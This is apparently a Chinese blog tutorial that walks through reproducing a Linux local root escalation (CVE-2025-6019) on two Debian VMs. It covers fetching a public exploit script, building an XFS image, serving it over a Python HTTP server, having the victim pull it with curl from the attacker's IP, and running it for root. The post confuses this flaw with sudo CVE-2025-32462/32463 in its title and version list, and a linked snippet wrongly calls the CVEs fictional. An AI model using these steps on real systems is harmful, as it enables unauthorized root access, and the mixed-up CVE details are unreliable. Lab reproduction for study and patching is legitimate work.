linux sudo提权CVE-2025-6019需要两台debian系统的虚拟主机,一台主机也可以,普通用户可以做被攻击,root可以做攻击(忘记root密码可以修改试试)提权

原创 已于 2025-07-18 10:25:29 修改 · 335 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #服务器 #ubuntu #debian #网络安全 #安全

于 2025-07-18 10:25:28 首次发布

先使用sudo -V 在目标主机查看版本

影响范围如下:
CVE-2025-32462:

1.9.0 <= sudo <= 1.9.17

1.8.8 <= sudo <= 1.8.32

CVE-2025-32463:

1.9.14 <= sudo <= 1.9.17

注意:Sudo 的旧版本(当前 <= 1.8.32)不易受到攻击,因为不存在 chroot 功能。

去该地址https://github.com/guinea-offensive-security/CVE-2025-6019下载exp(漏洞利用脚本)

将下载好的sh脚本放在攻击主机上

使用chmod +x给sh脚本执行权限,然后在攻击主机上使用root权限执行sh脚本

输入y,会提示一个报错,缺少xkfs.xfs,我们下载一下

使用apt install libglib2.0-bin xfsprogs该命令下载一下缺少的东西,在安装到98%时会卡一会,稍等一下

如果报错就使用apt update更新一下在下载

安装完之后再次执行sh脚本

输入y,然后输入l

就会在当前目录下生成一个xfs.image的一个文件

把xfs.image和exploit.sh上传到目标机中

使用python -m http.server 1234在攻击主机上开设一个端口

在被攻击主机执行curl http://攻击机ip:开设的端口,我这边开设的1234 (-o 是保存文件,后面跟的是保存后文件名字)

下载这两个文件,并赋予执行权限

在被攻击机上执行脚本,输入y和c,就拿到了root用户权限

【漏洞复现】Linux sudo chroot(CVE-2025-32463)本地漏洞
李同學的安全圈
08-15 128
Linux sudo chroot升漏洞(CVE-2025-32463)影响Sudo 1.9.14至1.9.17版本,允许低限用户通过特制chroot环境加载恶意动态库,以root限执行任意代码。攻击者可通过构建恶意环境实现升,测试在Docker和本地环境获得root限。建议用户立即升级至Sudo 1.9.17p1或更高版本,各主流Linux发行版已安全更新补丁。
CVE-2025-0618 CVE-2025-0619
weixin_53627195的博客
06-23 696
漏洞新闻
运维工程师来活了,Linux又报了两个超级漏洞(附解决方案)
IT运维技术圈
06-19 1858
CVE-2025-6018 漏洞源于 PAM 配置中的一个漏洞,具体来说就是允许远程用户(例如通过 SSH 登录)获得 "allow_active" 的状态。披露了两个关键的Linux漏洞:CVE-2025-6018和CVE-2025-6019CVE-2025-6018和CVE-2025-6019linux系统的一个重要的漏洞。:利用 libblockdev 的漏洞,通过 udisks 守护进程执行root角色操作,结合 CVE-2025-6018 的特状态,最终获得root限。
Linux 升漏洞(CVE-2025-6019):通过 udisksd 和 libblockdev 获取 root 限(PoC 已公开)
FreeBuf_的博客
07-07 2375
Linux本地漏洞CVE-2025-6019:allow_active组用户可获取root限,PoC已公开。
linuxshell脚本案例:处理CVE-2025-6018和CVE-2025-6019的漏洞问题
学亮编程手记
07-29 504
本文供一个简易的shell脚本来处理CVE-2025-6018和CVE-2025-6019的问题。
Linux PAM及udisks组件曝高危漏洞,无需特殊手段即可实现root级访问
FreeBuf_的博客
06-18 3611
Linux高危漏洞链曝光,主流发行版可轻松获取root限。
核弹级漏洞
m0_73399576的博客
07-03 1017
知识面,决定看到的攻击面有多广。知识链,决定发动的杀伤链有多深。
Linux 系统CVE-2025-6019 漏洞修复
07-19
首先,用户的问题是关于修复Linux系统中的CVE-2025-6019漏洞。系统指令要求我使用中文回答,结构清晰,并生成相关问题。同时,我必须遵循LaTeX格式规范:行内数学表达式用$...$,独立公式用$$...$$并单独成段。 ...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
OpenSSH是一种广泛使用的安全工具,它供了在不同主机之间进行安全远程登录和其他相关网络服务的功能。然而,随着时间的推移,OpenSSH可能会发现安全漏洞,这可能导致恶意攻击者利用这些弱点对系统进行入侵或数据...
Linux 怎么修复Cve-2025-6018和6019
07-24
我们注意到用户到的两个漏洞编号CVE-2025-6018和CVE-2025-6019是虚构的(因为当前时间是2023年,2025年的CVE编号尚未分配)。因此,我们无法供具体的修复步骤。但是,我们可以供修复Linux系统漏洞的一般性指导...
linux漏洞修复CVE-2025-6019
07-18
CVE-2025-6019 是一个影响 Linux 内核的本地升漏洞,攻击者可通过构造特定请求绕过访问控制机制,获取 root 限。该漏洞可被与 `udisksd` 和 `libblockdev` 相关的服务利用,并已在多个发行版中被公开 PoC ...
春秋云镜(Ray)-CVE-2023-6019
m0_61155226的博客
08-29 771
Ray的`cpu_profile` URL参数存在命令注入漏洞,允许攻击者在未经身份验证的情况下远程在运行Ray仪表板的系统上执行操作系统命令。根据公开的POC进行分析,可以得出漏洞存在的位置是:Jobs ->
安全研究年终总结:分享2024年RCE类的CVE漏洞高危EXP集合!
2401_89221445的博客
12-05 3371
缘起 网络安全漏洞不断变化且威胁日益严重,及时了解和修复这些漏洞至关重要。本文介绍的多个CVE漏洞,涉及常见的企业级软件和硬件,黑客可以利用这些漏洞远程控制系统、窃取敏感数据甚至完全破坏服务。 对于企业和开发者来说,了解这些漏洞不仅能帮助保护自己的系统,还能减少数据泄露、经济损失和品牌信誉的风险。因此,深入研究和及时修复这些漏洞是确保网络安全的关键步骤。 CVE-2024-8069 CVE-2024-8069 是一个影响 Citrix Session Recording 的严重漏洞,允许攻击者通过不安
2025版】最新微软最新多个高危漏洞预警,从零基础到精通,收藏这篇就够了!
Python_0011的博客
02-12 1878
2月11日微软发布了修复总共 141 个漏洞的补丁,4 个被归类为关键级。其中有 2 个漏洞正在被在野利用,强调了立即更新的紧迫性。此外,1 个漏洞在此次补丁周期之前就已经被公开,这标志着它是一个0day漏洞。强烈建议用户优先更新这些补丁,以保护他们的系统免受潜在威胁。Windows Ancillary Function Driver for WinSock 漏洞 (CVE-2025-21418)此漏洞被识别为 CVE-2025-21418,严重程度评分为重要,CVSS 评分为 7.8。
Linux两大新漏洞曝光,快看你中招没
weixin_43209512的博客
07-05 409
【紧急安全警报】Qualys披露两个高危Linux漏洞(CVE-2025-6018/6019),影响主流发行版!普通用户可获取root限:6018漏洞通过PAM配置漏洞实现升,6019漏洞通过XFS镜像获取SUID-root限。建议立即更新系统补丁、调整Polkit策略、审计限配置并隔离SSH限。请所有Linux用户紧急排查! #Linux漏洞 #网络安全
【实时Linux实战系列】基于实时Linux的自适应控制系统
望获实时Linux系统
08-19 1055
本文介绍了基于实时Linux的自适应控制系统开发技术,重点阐述了其在工业自动化、航空航天等领域的应用价值。文章详细说明了环境准备、案例实现步骤和调试方法,包括温度自适应控制系统的开发过程,涉及实时任务调度、传感器数据采集和PWM控制等关键技术。同时供了常见问题的解决方案和性能优化建议,为开发者掌握这一技术供了实用指导。该技术能显著系统响应速度和稳定性,适用于需要高精度实时控制的各类场景。
20250822给荣品RD-RK3588开发板刷Rockchip原厂的Buildrootlinux-5.10】时点亮荣品的8寸屏
南岭笑笑生之家
08-22 401
摘要 本文记录了在荣品RD-RK3588开发板上刷写Rockchip原厂Buildroot(Linux 5.10)系统并点亮荣品8寸MIPI屏幕的过程。主要工作包括修改设备树配置文件(rk3588-evb.dtsi和rk3588-evb7-lp4.dtsi),解决GPIO冲突问题,配置MIPI-DSI接口参数,调整屏供电控制,以及修改背光控制相关设置。通过修改DSI面板参数、调整VOP分配、重新定义GPIO引脚等功能,最终实现了8寸屏幕(1200×1920分辨率)的正常显示。文中还供了详细的设备树修改记录
[特殊字符] 潜入深渊:探索 Linux 内核源码的奇幻之旅与生存指南
最新发布
kernelguru的博客
08-22 425
Linux内核源码探索指南 Linux内核源码是驱动数字世界的核心工程杰作,全球开发者协作的典范。关键目录包括:arch/(CPU架构相关)、drivers/(硬件驱动)、fs/(文件系统)、kernel/(进程调度等核心功能)。建议开发者通过具体问题切入(如系统调用流程),善用cscope/ctags等工具,结合官方文档逐步深入。内核开发采用邮件列表协作模式,补丁需经严格审查。初学者应注重理解主线逻辑,从简单驱动开始实践,警惕并发问题。探索内核源码是理解计算机系统本质的绝佳途径,虽具挑战但收获巨大。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值